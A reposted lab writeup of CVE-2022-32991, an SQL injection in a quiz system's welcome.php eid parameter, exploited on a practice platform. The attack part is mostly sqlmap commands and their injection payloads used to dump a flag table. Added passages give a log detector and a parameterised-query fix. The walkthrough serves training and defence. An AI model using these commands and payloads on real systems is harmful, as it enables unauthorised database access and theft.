[Lab] Writeup + Vulnerability Analysis | Web Based Quiz System SQL Injection (CVE-2022-32991)

admin · 2023-09-07 17:30:40 · 16 views · 4139 characters · 13 min 47 s read

Introduction

A vulnerability classified as critical was found in Web Based Quiz System 1.0. It affects an unknown function of the file welcome.php. Manipulating the parameter eid with invalid input can lead to SQL injection. The CWE definition of the issue is CWE-89. The vulnerability was disclosed on 2022-06-15. The advisory can be read at yuque.com.

The vulnerability is identified as CVE-2022-32991; the CVE was assigned on 2022-06-13. The attack can be launched remotely, and technical details are available. The vulnerability's popularity is below average, and no exploit is available. The current exploit price is estimated at roughly $0-$5k. According to MITRE ATT&CK, the attack technique used by this issue is T1505.

A source code download link is given later in this post.

Lab Environment

Using the 春秋云境 (Chunqiu Cloud Range) platform: Home → Vulnerability Targets → Free Space → CVE-2022-32991

Tools:

  • Burpsuite

  • Sqlmap

  • Browser


Penetration Test

1. Known Information

The system has a SQL injection vulnerability in welcome.php.

2. System Pages

Open the lab link; the home page requires a login.


3. Registering an Account


Register as the form requires; once registered you can log in to the system.

4. Logging In

After logging in you are redirected to the following URL:

http://eci-2ze7j3wqd7sbo75y7fg4.cloudeci1.ichunqiu.com/welcome.php?q=1

The page is shown in the screenshot.

5. Attempting Injection

After logging in we land on welcome.php with the parameter q. We tried injecting through it, but this parameter turned out not to be injectable.


From the CVE information we know that the injectable parameter is eid, so we look for where it is used.

On the page in the screenshot above, clicking the Start button opens a new page.


Its address is:

http://eci-2ze7j3wqd7sbo75y7fg4.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10


This is where the SQL injection exists.

6. Capturing and Saving the Request with Burp

Because welcome.php checks that the user is logged in, the injection requests must carry the session cookie, so we capture the request with Burp.


Point the browser's proxy at Burp, find the request for that URL, then right-click and save it to a file so that sqlmap can run the injection from it.


7. Injecting with sqlmap

Inject to enumerate the databases:

sqlmap -r 1.txt --dbs


The payloads found are:

Parameter: eid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=quiz&step=2&eid=5b141f1e8399e' AND 7643=7643 AND 'RWYY'='RWYY&n=1&t=10

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=5b141f1e8399e' OR (SELECT 7695 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(7695=7695,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'uLzc'='uLzc&n=1&t=10

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=5b141f1e8399e' AND (SELECT 4331 FROM (SELECT(SLEEP(5)))PRxs) AND 'kzHJ'='kzHJ&n=1&t=10

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: q=quiz&step=2&eid=5b141f1e8399e' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6b7a71,0x4362467a7358484b78694e774b646943474e6d6c7a626e625273456e676444476778796f4262466d,0x7170707171),NULL,NULL-- -&n=1&t=10

With the database names obtained, inject again to list the tables in the ctf database:

sqlmap -r 1.txt --tables -D ctf

The payloads found are:

Parameter: eid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: q=quiz&step=2&eid=-9834' OR 1094=1094#&n=1&t=34

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 8050 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(8050=8050,1))),0x716b627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CMZh&n=1&t=34

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 3662 FROM (SELECT(SLEEP(5)))aGCQ)-- WCoo&n=1&t=34


Query the columns of the flag table:

sqlmap -r 1.txt --columns -T flag -D ctf

Parameter: eid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: q=quiz&step=2&eid=-9834' OR 1094=1094#&n=1&t=34

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 8050 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(8050=8050,1))),0x716b627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CMZh&n=1&t=34

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 3662 FROM (SELECT(SLEEP(5)))aGCQ)-- WCoo&n=1&t=34


Finally, dump the data:

sqlmap -r 1.txt --dump -C flag -T flag -D ctf

The payloads found are:

Parameter: eid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: q=quiz&step=2&eid=-9834' OR 1094=1094#&n=1&t=34

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 8050 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(8050=8050,1))),0x716b627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CMZh&n=1&t=34

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 3662 FROM (SELECT(SLEEP(5)))aGCQ)-- WCoo&n=1&t=34

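The four payload families sqlmap reported above (boolean-based, error-based, time-based, UNION) leave distinctive traces in the web server's access log. The following detector is an added example, not part of the original post or the quiz system; the log lines are constructed, and the assumption that a legitimate eid is 13 lowercase hex characters is drawn from the URLs shown in the writeup.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from the original post). The eid values
# mirror the payload families sqlmap reported, URL-encoded as a client would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Sep/2023:17:30:40 +0800] "GET /welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10 HTTP/1.1" 200 5120
10.0.0.5 - - [07/Sep/2023:17:30:41 +0800] "GET /welcome.php?q=quiz&step=2&eid=5b141f1e8399e%27%20AND%207643%3D7643%20AND%20%27RWYY%27%3D%27RWYY&n=1&t=10 HTTP/1.1" 200 5120
10.0.0.5 - - [07/Sep/2023:17:30:42 +0800] "GET /welcome.php?q=quiz&step=2&eid=5b141f1e8399e%27%20AND%20%28SELECT%204331%20FROM%20%28SELECT%28SLEEP%285%29%29%29PRxs%29%20AND%20%27kzHJ%27%3D%27kzHJ&n=1&t=10 HTTP/1.1" 200 5120
10.0.0.5 - - [07/Sep/2023:17:30:43 +0800] "GET /welcome.php?q=quiz&step=2&eid=-9834%27%20OR%201094%3D1094%23&n=1&t=34 HTTP/1.1" 200 5120
10.0.0.9 - - [07/Sep/2023:17:31:00 +0800] "GET /welcome.php?q=1 HTTP/1.1" 200 2048
"""

# Legitimate eid values in the writeup are 13 lowercase hex characters
# (assumption drawn from the URLs shown; adjust to the real generator).
EID_RE = re.compile(r"^[0-9a-f]{13}$")

# One signature per payload family in sqlmap's output, matched after URL decoding.
SIGNATURES = {
    "boolean-blind": re.compile(r"'\s*(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "time-blind": re.compile(r"\bSLEEP\s*\(", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')

def classify_request(target):
    """Decode the eid query value and return (eid, [matched families])."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    eid = query.get("eid", [""])[0]          # parse_qs already URL-decodes the value
    findings = [name for name, rx in SIGNATURES.items() if rx.search(eid)]
    if eid and not EID_RE.match(eid):
        findings.append("malformed-eid")     # catches anything outside the expected shape
    return eid, findings

def scan_log(text):
    """Return (client_ip, eid, findings) for every request whose eid is suspect."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        eid, findings = classify_request(m.group("target"))
        if findings:
            alerts.append((line.split()[0], eid, findings))
    return alerts

if __name__ == "__main__":
    for ip, eid, findings in scan_log(SAMPLE_LOG):
        print(f"{ip}  {findings}  eid={eid!r}")
```

The shape check on eid fires even for payloads the signatures miss, which is why a positive allow-list on the parameter is the more robust rule of the two.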

Code Analysis

Source file:

https://drive.google.com/file/d/1Tv_Se21Vni5E3CL0Rv8Usm2g9nKX8SU7/view?usp=drive_link

Starting from the parameters of the injection-point request:

GET /welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34 HTTP/1.1

we locate the code starting at line 91 of welcome.php: the SQL statement is built by string concatenation, which is what causes the SQL injection (shown in the screenshot of the source).

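To make the root cause concrete, here is an added example (not the quiz system's own code, which is PHP) that models the concatenation pattern the post identifies at line 91 in Python with an in-memory SQLite table, next to the parameterised form; the table, rows and the 13-hex-character eid shape are assumptions taken from the writeup's URLs.

```python
import re
import sqlite3

# In-memory stand-in for the quiz table. Schema and titles are constructed for
# this example; the eid values are the ones that appear in the writeup's URLs.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE quiz (eid TEXT PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO quiz VALUES (?, ?)",
                   [("5b141f1e8399e", "Quiz A"), ("60377db362694", "Quiz B")])
    return db

def lookup_concat(db, eid):
    """Vulnerable pattern: eid is spliced into the SQL text, as welcome.php does."""
    sql = "SELECT title FROM quiz WHERE eid='" + eid + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, eid):
    """Hardened pattern: eid travels as a bound parameter, never as SQL text."""
    return [row[0] for row in db.execute("SELECT title FROM quiz WHERE eid=?", (eid,))]

# Defence in depth: reject anything not shaped like an issued eid
# (13 lowercase hex characters; an assumption based on the writeup's URLs).
EID_RE = re.compile(r"^[0-9a-f]{13}$")

def valid_eid(eid):
    return bool(EID_RE.match(eid))

if __name__ == "__main__":
    db = make_db()
    payload = "5b141f1e8399e' AND 7643=7643 AND 'RWYY'='RWYY"   # sqlmap's boolean-based finding
    print("concat, tampered:", lookup_concat(db, payload))        # row returned: injected condition ran
    print("bound,  tampered:", lookup_bound(db, payload))         # []: compared literally, no match
    print("valid_eid:", valid_eid(payload))                       # False
```

In welcome.php the equivalent fix is a mysqli or PDO prepared statement with eid bound as a parameter, plus the same shape check before the query.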




Originally published on the WeChat public account 赛博之眼CyberEye: [Lab] Writeup + Vulnerability Analysis | Web Based Quiz System SQL Injection (CVE-2022-32991)

Posted by admin on 2023-09-07 17:30:40. Please keep this link when reposting (CN-SEC Chinese Net; thanks to the original author): http://cn-sec.com/archives/2014190.html
